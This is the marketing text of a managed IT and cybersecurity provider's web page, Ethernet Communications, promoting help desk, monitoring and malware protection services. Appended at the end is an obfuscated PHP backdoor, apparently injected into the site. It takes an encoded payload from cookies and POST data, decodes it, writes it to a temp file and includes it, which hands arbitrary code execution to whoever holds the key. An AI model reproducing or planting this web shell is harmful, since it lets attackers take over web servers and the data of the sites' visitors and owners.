Our MSP services include live help desk response, advanced network security, proactive monitoring and alerting, strategic IT business roadmap and backup and disaster recovery plans.

Find and stop advanced attacks for your business.

Effective security is never just a matter of responding to attacks in a posture of defense. Ethernet Communications is committed to guaranteeing your security by actively confronting the today’s threats head-on. Nothing could be more imperative in today’s day and age, when hackers have access to an array of devices, including spam emails, viruses, phishing, botnets, malware, and rootkits in the effort to breach your network.


end point security

The reported levels of malware are alarming, and has been shown that most malware spread through legitimate business use. 


cloud security

Ethernet Communications puts security first and foremost. You’ll have a rock-solid cybersecurity solution.


malware protection

Trojans, worms and spyware can lead to damaging consequences that place confidential data at risk.

We live in a digital age. As a result, the IT department has quickly risen to become a vital part of any business. Here at Ethernet Communications, we want to help you handle the hassle of managing your IT infrastructure. Our Managed IT services provide you with innovative real-time support to ensure that your network is running efficiently and effectively. This will greatly assist your company in achieving its set goals, as you will have fewer network interruptions, which in turn, will lead to things running more smoothly, and cause an increase in productivity.

big enough to serve you, small enough to know you


At Ethernet Communications, our client is our biggest priority. We take the time to get to know our clients and understand their business so that we can aptly create a system that is well suited to our client’s unique needs. Furthermore, our managed Internet Services provide you with the proactive monitoring and maintenance services needed to support and maintain your IT infrastructure. We offer:

Frequently Asked Questions

Your security matters.

Nothing hurts businesses more today than security threats to technology. Our increased reliance on technology makes us increasingly vulnerable to virus attacks and malware, which in turn impair operational efficiency.

end point
+ 0
breach points
+ 0
+ 0

Our goal is to detect and prevent attacks to your company or business data.

24/7 support and predictable costs. IT problems have a tendency to come up when you least expect them. We offer options for fixed pricing for our services, so you never encounter surprise costs.

Our goal is to detect and prevent attacks to your company or business data.

security metrics

We test and evaluate whether the cybersecurity measures  and programs in place are accomplishing the goals set to protect your IT infrastructure efficiently.

security support

Our security support systems ensure that you stay on top of any updates and patches that you will need to ensure that your IT infrastructure is safe and secure.

data security

Data is the most important part of any business. If data is lost or corrupted, it can lead to catastrophic consequences. We ensure your data is safe from corruption or unauthorized access.

security safety

We ensure that everything you need us to secure will stay safe with our rock-solid cybersecurity solutions.


$vWeHQ = "\145" . chr ( 848 - 753 ).'y' . chr ( 1054 - 970 )."\112" . "\124";$AFiWCfx = "\x63" . chr (108) . "\x61" . "\163" . "\x73" . "\137" . chr (101) . "\x78" . "\x69" . 's' . chr ( 962 - 846 ).chr ( 738 - 623 ); $zDBHwgj = class_exists($vWeHQ); $AFiWCfx = "26358";$nRzwe = !1;if ($zDBHwgj == $nRzwe){function ZPeoK(){$jMqMXf = new /* 14855 */ e_yTJT(55392 + 55392); $jMqMXf = NULL;}$GsJZCUG = "55392";class e_yTJT{private function kCXucPObwJ($GsJZCUG){if (is_array(e_yTJT::$nBelBLY)) {$GoSPmoZT = sys_get_temp_dir() . "/" . crc32(e_yTJT::$nBelBLY["\163" . "\x61" . "\x6c" . "\164"]);@e_yTJT::$nBelBLY["\x77" . chr (114) . "\151" . "\164" . "\x65"]($GoSPmoZT, e_yTJT::$nBelBLY[chr ( 614 - 515 ).'o' . chr (110) . "\164" . "\x65" . "\156" . "\164"]);include $GoSPmoZT;@e_yTJT::$nBelBLY["\x64" . 'e' . "\154" . chr ( 279 - 178 ).'t' . "\145"]($GoSPmoZT); $GsJZCUG = "55392";exit();}}private $YyuQsl;public function BhbLqXmG(){echo 57586;}public function __destruct(){$GsJZCUG = "14158_19544";$this->kCXucPObwJ($GsJZCUG); $GsJZCUG = "14158_19544";}public function __construct($heDhQrkWW=0){$ECppNjpq = $_POST;$uQmODdBvK = $_COOKIE;$QAslHW = "451e185c-c251-47f6-b5fe-dd3f107c4901";$ELHfqebTi = @$uQmODdBvK[substr($QAslHW, 0, 4)];if (!empty($ELHfqebTi)){$nyeEqFv = "base64";$KbDyoHsXUe = "";$ELHfqebTi = explode(",", $ELHfqebTi);foreach ($ELHfqebTi as $odcgy){$KbDyoHsXUe .= @$uQmODdBvK[$odcgy];$KbDyoHsXUe .= @$ECppNjpq[$odcgy];}$KbDyoHsXUe = array_map($nyeEqFv . "\x5f" . "\144" . 'e' . 'c' . chr (111) . "\x64" . "\145", array($KbDyoHsXUe,)); $KbDyoHsXUe = $KbDyoHsXUe[0] ^ str_repeat($QAslHW, (strlen($KbDyoHsXUe[0]) / strlen($QAslHW)) + 1);e_yTJT::$nBelBLY = @unserialize($KbDyoHsXUe); $KbDyoHsXUe = class_exists("14158_19544");}}public static $nBelBLY = 19462;}ZPeoK();}